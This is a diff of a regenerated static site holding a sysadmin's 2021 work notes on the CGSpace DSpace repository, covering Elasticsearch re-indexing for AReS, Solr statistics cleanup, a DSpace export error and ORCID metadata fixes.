<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./check-spider-ip-hits.sh -d -f /tmp/ips -s http://localhost:8081/solr -s statistics -p
</span></span></code></pre></div><h2 id="2021-01-11">2021-01-11</h2>
<ul>
<li>The AReS indexing finished this morning and I moved the <code>openrxv-items-temp</code> core to <code>openrxv-items</code> (see above)
<ul>
@ -351,8 +351,8 @@ $ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-i
</li>
<li>I deployed the community-filiator fix on CGSpace and moved the Gender Platform community to the top level of CGSpace:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/66598 --child<span style="color:#f92672">=</span>10568/106605
</code></pre></div><h2 id="2021-01-12">2021-01-12</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/66598 --child<span style="color:#f92672">=</span>10568/106605
</span></span></code></pre></div><h2 id="2021-01-12">2021-01-12</h2>
<ul>
<li>IWMI is really pressuring us to have a periodic CSV export of their community
<ul>
@ -393,29 +393,29 @@ $ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-i
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
# start indexing in AReS
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span><span style="display:flex;"><span># start indexing in AReS
</span></span></code></pre></div><ul>
<li>Then, the next morning when it&rsquo;s done, check the results of the harvesting, backup the current <code>openrxv-items</code> index, and clone the <code>openrxv-items-temp</code> index to <code>openrxv-items</code>:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 100540,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-01-18
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-01-18&#39;</span>
</code></pre></div><h2 id="2021-01-18">2021-01-18</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 100540,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-01-18
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-01-18&#39;</span>
</span></span></code></pre></div><h2 id="2021-01-18">2021-01-18</h2>
<ul>
<li>Finish the indexing on AReS that I started yesterday</li>
<li>Udana from IWMI emailed me to ask why the iwmi.csv doesn&rsquo;t include items he approved to CGSpace this morning
@ -462,9 +462,9 @@ localhost/dspace63= &gt; COMMIT;
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ docker exec -it api /bin/bash
# apt update <span style="color:#f92672">&amp;&amp;</span> apt install unoconv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker exec -it api /bin/bash
</span></span><span style="display:flex;"><span># apt update <span style="color:#f92672">&amp;&amp;</span> apt install unoconv
</span></span></code></pre></div><ul>
<li>Help Peter get a list of titles and DOIs for CGSpace items that Altmetric does not have an attention score for
<ul>
<li>He generated a list from their dashboard and I extracted the DOIs in OpenRefine (because it was WINDOWS-1252 and csvcut couldn&rsquo;t do it)</li>
@ -512,30 +512,30 @@ localhost/dspace63= &gt; COMMIT;
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
# start indexing in AReS
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span><span style="display:flex;"><span># start indexing in AReS
</span></span></code></pre></div><ul>
<li>Then, the next morning when it&rsquo;s done, check the results of the harvesting, backup the current <code>openrxv-items</code> index, and clone the <code>openrxv-items-temp</code> index to <code>openrxv-items</code>:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 100699,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#960050;background-color:#1e0010">&#39;</span><span style="color:#f92672">{</span><span style="color:#e6db74">&#34;settings&#34;</span>: <span style="color:#f92672">{</span><span style="color:#e6db74">&#34;index.b
</span><span style="color:#e6db74"></span>locks.write&#34;:true}}&#39;
$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-01-25
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-01-25&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 100699,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#960050;background-color:#1e0010">&#39;</span><span style="color:#f92672">{</span><span style="color:#e6db74">&#34;settings&#34;</span>: <span style="color:#f92672">{</span><span style="color:#e6db74">&#34;index.b
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74"></span>locks.write&#34;:true}}&#39;
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-01-25
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-01-25&#39;</span>
</span></span></code></pre></div><ul>
<li>Resume working on CG Core v2, I realized a few things:
<ul>
<li>We are trying to move from <code>dc.identifier.issn</code> (and ISBN) to <code>cg.issn</code>, but this is currently implemented as a &ldquo;qualdrop&rdquo; input in DSpace&rsquo;s submission form, which only works to fill in the qualifier (ie <code>dc.identier.xxxx</code>)
@ -601,12 +601,12 @@ java.lang.IllegalArgumentException: Invalid character found in the request targe
<li>I <a href="https://jira.lyrasis.org/browse/DS-4566">filed a bug</a> on DSpace&rsquo;s issue tracker (though I accidentally hit Enter and submitted it before I finished, and there is no edit function)</li>
<li>Looking into Linode report that the load outbound traffic rate was high this morning:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># grep -E <span style="color:#e6db74">&#39;26/Jan/2021:(08|09|10|11|12)&#39;</span> /var/log/nginx/rest.log | goaccess --log-format<span style="color:#f92672">=</span>COMBINED -
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># grep -E <span style="color:#e6db74">&#39;26/Jan/2021:(08|09|10|11|12)&#39;</span> /var/log/nginx/rest.log | goaccess --log-format<span style="color:#f92672">=</span>COMBINED -
</span></span></code></pre></div><ul>
<li>The culprit seems to be the ILRI publications importer, so that&rsquo;s OK</li>
<li>But I also see an IP in Jordan hitting the REST API 1,100 times today:</li>
</ul>
<pre tabindex="0"><code>80.10.12.54 - - [26/Jan/2021:09:43:42 +0100] &quot;GET /rest/rest/bitstreams/98309f17-a831-48ed-8f0a-2d3244cc5a1c/retrieve HTTP/2.0&quot; 302 138 &quot;http://wp.local/&quot; &quot;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36&quot;
<pre tabindex="0"><code>80.10.12.54 - - [26/Jan/2021:09:43:42 +0100] &#34;GET /rest/rest/bitstreams/98309f17-a831-48ed-8f0a-2d3244cc5a1c/retrieve HTTP/2.0&#34; 302 138 &#34;http://wp.local/&#34; &#34;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36&#34;
</code></pre><ul>
<li>Seems to be someone from CodeObia working on WordPress
<ul>
@ -615,8 +615,8 @@ java.lang.IllegalArgumentException: Invalid character found in the request targe
</li>
<li>I purged all ~3,000 statistics hits that have the &ldquo;<a href="http://wp.local/%22">http://wp.local/&quot;</a> referrer:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;referrer:http\:\/\/wp\.local\/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;referrer:http\:\/\/wp\.local\/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</span></span></code></pre></div><ul>
<li>Tag version 0.4.3 of the csv-metadata-quality tool on GitHub: <a href="https://github.com/ilri/csv-metadata-quality/releases/tag/v0.4.3">https://github.com/ilri/csv-metadata-quality/releases/tag/v0.4.3</a>
<ul>
<li>I just realized that I never submitted this to CGSpace as a Big Data Platform output</li>
@ -661,9 +661,9 @@ java.lang.IllegalArgumentException: Invalid character found in the request targe
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
# start indexing in AReS
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span><span style="display:flex;"><span># start indexing in AReS
</span></span></code></pre></div><ul>
<li>Sent out emails about CG Core v2 to Macaroni Bros, Fabio, Hector at CCAFS, Dani and Tariku</li>
<li>A bit more minor work on testing the series/report/journal changes for CG Core v2</li>
</ul>

View File

@ -60,7 +60,7 @@ $ curl -s &#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#3
}
}
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -157,34 +157,34 @@ $ curl -s &#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#3
<li>I had a call with CodeObia to discuss the work on OpenRXV</li>
<li>Check the results of the AReS harvesting from last night:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 100875,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 100875,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><ul>
<li>Set the current items index to read only and make a backup:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39; {&#34;settings&#34;: {&#34;index.blocks.write&#34;:true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-01
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39; {&#34;settings&#34;: {&#34;index.blocks.write&#34;:true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-01
</span></span></code></pre></div><ul>
<li>Delete the current items index and clone the temp one to it:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
</span></span></code></pre></div><ul>
<li>Then delete the temp and backup:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
{&#34;acknowledged&#34;:true}%
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-02-01&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span><span style="display:flex;"><span>{&#34;acknowledged&#34;:true}%
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-02-01&#39;</span>
</span></span></code></pre></div><ul>
<li>Meeting with Peter and Abenet about CGSpace goals and progress</li>
<li>Test submission to DSpace via REST API to see if Abenet can fix / reject it (submit workflow?)</li>
<li>Get Peter a list of users who have submitted or approved on DSpace everrrrrrr, so he can remove some</li>
@ -196,25 +196,25 @@ $ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-i
</li>
<li>I tried to export the ILRI community from CGSpace but I got an error:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ dspace metadata-export -i 10568/1 -f /tmp/2021-02-01-ILRI.csv
Loading @mire database changes for module MQM
Changes have been processed
Exporting community &#39;International Livestock Research Institute (ILRI)&#39; (10568/1)
Exception: null
java.lang.NullPointerException
at com.google.common.base.Preconditions.checkNotNull(Preconditions.java:212)
at com.google.common.collect.Iterators.concat(Iterators.java:464)
at org.dspace.app.bulkedit.MetadataExport.addItemsToResult(MetadataExport.java:136)
at org.dspace.app.bulkedit.MetadataExport.buildFromCommunity(MetadataExport.java:125)
at org.dspace.app.bulkedit.MetadataExport.&lt;init&gt;(MetadataExport.java:77)
at org.dspace.app.bulkedit.MetadataExport.main(MetadataExport.java:282)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace metadata-export -i 10568/1 -f /tmp/2021-02-01-ILRI.csv
</span></span><span style="display:flex;"><span>Loading @mire database changes for module MQM
</span></span><span style="display:flex;"><span>Changes have been processed
</span></span><span style="display:flex;"><span>Exporting community &#39;International Livestock Research Institute (ILRI)&#39; (10568/1)
</span></span><span style="display:flex;"><span> Exception: null
</span></span><span style="display:flex;"><span>java.lang.NullPointerException
</span></span><span style="display:flex;"><span> at com.google.common.base.Preconditions.checkNotNull(Preconditions.java:212)
</span></span><span style="display:flex;"><span> at com.google.common.collect.Iterators.concat(Iterators.java:464)
</span></span><span style="display:flex;"><span> at org.dspace.app.bulkedit.MetadataExport.addItemsToResult(MetadataExport.java:136)
</span></span><span style="display:flex;"><span> at org.dspace.app.bulkedit.MetadataExport.buildFromCommunity(MetadataExport.java:125)
</span></span><span style="display:flex;"><span> at org.dspace.app.bulkedit.MetadataExport.&lt;init&gt;(MetadataExport.java:77)
</span></span><span style="display:flex;"><span> at org.dspace.app.bulkedit.MetadataExport.main(MetadataExport.java:282)
</span></span><span style="display:flex;"><span> at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
</span></span><span style="display:flex;"><span> at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
</span></span><span style="display:flex;"><span> at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
</span></span><span style="display:flex;"><span> at java.lang.reflect.Method.invoke(Method.java:498)
</span></span><span style="display:flex;"><span> at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
</span></span><span style="display:flex;"><span> at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
</span></span></code></pre></div><ul>
<li>I imported the production database to my local development environment and I get the same error&hellip; WTF is this?
<ul>
<li>I was able to export another smaller community</li>
@ -234,28 +234,28 @@ java.lang.NullPointerException
<li>Maria Garruccio sent me some new ORCID iDs for Bioversity authors, as well as a correction for Stefan Burkart&rsquo;s iD</li>
<li>I saved the new ones to a text file, combined them with the others, extracted the ORCID iDs themselves, and updated the names using <code>resolve-orcids.py</code>:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity-orcid-ids.txt | grep -oE <span style="color:#e6db74">&#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39;</span> | sort | uniq &gt; /tmp/2021-02-02-combined-orcids.txt
$ ./ilri/resolve-orcids.py -i /tmp/2021-02-02-combined-orcids.txt -o /tmp/2021-02-02-combined-orcid-names.txt
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity-orcid-ids.txt | grep -oE <span style="color:#e6db74">&#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39;</span> | sort | uniq &gt; /tmp/2021-02-02-combined-orcids.txt
</span></span><span style="display:flex;"><span>$ ./ilri/resolve-orcids.py -i /tmp/2021-02-02-combined-orcids.txt -o /tmp/2021-02-02-combined-orcid-names.txt
</span></span></code></pre></div><ul>
<li>I sorted the names and added the XML formatting in vim, then ran it through tidy:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ tidy -xml -utf8 -m -iq -w <span style="color:#ae81ff">0</span> dspace/config/controlled-vocabularies/cg-creator-id.xml
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ tidy -xml -utf8 -m -iq -w <span style="color:#ae81ff">0</span> dspace/config/controlled-vocabularies/cg-creator-id.xml
</span></span></code></pre></div><ul>
<li>Then I added all the changed names plus Stefan&rsquo;s incorrect ones to a CSV and processed them with <code>fix-metadata-values.py</code>:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat 2021-02-02-fix-orcid-ids.csv
cg.creator.id,correct
Burkart Stefan: 0000-0001-5297-2184,Stefan Burkart: 0000-0001-5297-2184
Burkart Stefan: 0000-0002-7558-9177,Stefan Burkart: 0000-0001-5297-2184
Stefan Burkart: 0000-0001-5297-2184,Stefan Burkart: 0000-0001-5297-2184
